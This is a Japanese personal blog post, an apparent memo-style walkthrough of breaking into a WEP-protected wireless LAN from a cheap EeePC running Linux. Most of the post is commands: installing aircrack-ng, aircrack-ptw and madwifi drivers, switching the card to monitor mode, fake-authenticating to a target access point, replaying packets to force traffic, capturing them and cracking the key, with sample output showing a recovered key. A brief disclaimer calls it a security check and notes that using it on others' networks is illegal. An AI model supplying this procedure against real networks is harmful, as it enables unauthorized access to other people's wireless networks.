100円パソコンで無線LANハッキング | WEB系技術電脳日記

100円パソコンで無線LANハッキング


EeePC

EeePC100円パソコン
無線LANハッキング

ハッキングなんて
タイトル付けると大げさだが、
ただ鍵をかけてる
無線LANに侵入するだけ。

方法も至って簡単。
先日買ったEeePCに
Linuxを入れて、
aircrack-ptw でWEP解析するだけ。
Linux初心者の私でもできる、
凄くタイトル負け(´・ω・) ス



■セキュリティのために書いているので、
■実際に他人の電波でやると法律に触れます。
■あくまで、セキュリティの確認で行ってください。


多分、サーバー管理者ならセキュリティの為に、
実際に少し前から、airsort(だっけかな?)airsnort 辺りから試してるとは思う。

恥を忍んで備忘記録のために手順を記述。
誰かの手助けになれば嬉しい(´・ω・) ス


■まずは、linux(eeeubuntu)を入れたEeePC701を用意。
09/3/2 追記:
701 4G-XはAtheros/ARxxxx だと思うけど、
701SD-X → Realtechとかの模様??
すまん・・実機確認してないです。
 

■aircrack-ngをインストール。
 上のメニューから[システム]→[Synapticパッケージマネージャー]を起動し、
 検索で、aircrack と検索します。
 私の場合、どういう訳か、そのまま入れる事ができなかったので、
 ダウンロードだけして、端末でインストール。
■aircrack-ptwを入れる。
 アプリケーションから[アクセサリ]→[端末]でターミナルを開く
 cd /usr/local/src
 wget http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/download/aircrack-ptw-1.0.0.tar.gz
 tar -zxvf aircrack-ptw-1.0.0.tar.gz
 cd aircrack-ptw-1.0.0
 make
 make install
 cp aircrack-ptw /usr/bin/
 http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/download/aircrack-ptw-1.0.0.tar.gz
 のURLでなぜか数回404出される。一応ブラウザでデレクトリーを削って、
 叩いてコピーしてみる事を推奨。(・・・たまたまかな?)
  ○ちとハマル 
  この後に端末で、NICをモニターモードにする手順があるけど、
  ((airmon-ngで確認の際
  なぜかモニターモードにならなかった。
  私と同じような初心もたまに要る模様。
  wifi0 Atheros
  madwifi-ng/usr/sbin/airmon-ng: 294: wlanconfig: not found
  ググると同じような初心者を発見。
 http://forum.cc-team.org/viewtopic.php?p=73066
 ↓迷走開始//----------------------------------------------
 ↓ wlanconfigが無い・・。
 ↓ wlanconfig ath0 create wlandev wifi0 wlanmode managed
 ↓ とかしないとまずいのか?
 ↓ VAPがないという事は、作らないとまずいのか・・。
 ↓--------------------------------------------------------
 ↓
 結局 madwifiのドライバーで解決
 sudo apt-get update
 sudo apt-get install build-essential
 wget http://snapshots.madwifi.org/madwifi-hal-0.10.5.6-current.tar.gz
 tar zxvf madwifi-hal-0.10.5.6-current.tar.gz
 cd madwifi-hal-0.10.5.6-(イントール時に番号(´・ω・) スね )
 make clean
 make
 sudo make install
 sudo reboot

■NICの状態を確認
 iwconfig で状態確認
 VAPを追加するか、一度ath0を無効にしてwifi0をスタートさせる。
 ※VAPを追加したら、どうい訳かNIC認識が変になったので、上記の方法。
 ※数回試しても問題がなければ、OSから再度検証。
 airmon-ng stop ath0
 airmon-ng start wifi0
 airmon-ng ←モニターモードか確認

■近くのワイヤレスLANのサーチ
 airodump-ng ath0
 
■ターゲットAPのパケットの受信

 aireplay-ng -1 ★何秒毎 -a ★ターゲットAPのBSSID -h ★NICのMACアドレス -e ★ターゲットAPのESSID> <使用するNIC>」
 aireplay-ng -1 0 -a ターゲットAPのXX:XX:XX:XX:XX:XX -h MM:MM:MM:MM:MM:MM -e ESSID ath0
 aireplay-ng -1 0 -a XX:XX:XX:XX:XX:XX -h MM:MM:MM:MM:MM:MM -e ESSID ath0
 
 ここでBSSID = Basic Service Set Identifier。無線LANアクセスポイントの識別子。通常MACアドレス。
  ESSID = 無線LANネットワークの識別子。いわゆるESSID。
 【参照】mtanaka氏
  http://d.hatena.ne.jp/mtanaka/20081026/p1

■パケット受信記録をファイルに書き出す。
 airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w 書き出すファイル名 ath0
 ※指定しなければrootになるけど、消すの面倒なら、適度にパスも。
 ※何かのエラーで上記 1 が違うチャネルなら、iwconfig ~でチャンネル変更
 
■強制的にパケットを発射させる。
 aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h MM:MM:MM:MM:MM:MM ath0
 
■解析開始
 aircrack-ptw 書き出すファイル名.cap
 
 allocationg a new table
 bssid = XX:XX:XX:XX:XX:XX keyindex=0
 stats for bssid XX:XX:XX:XX:XX:XX keyindex=0 packet=27335
 Found key with len 05: xx xx xx xx xx ←WEBのパスワード。
 
 パスワードはHEX形式で表示される

このマシン語みたいな、HEX・・・変換しないとまずいのか。
ん~・・・・((後日記載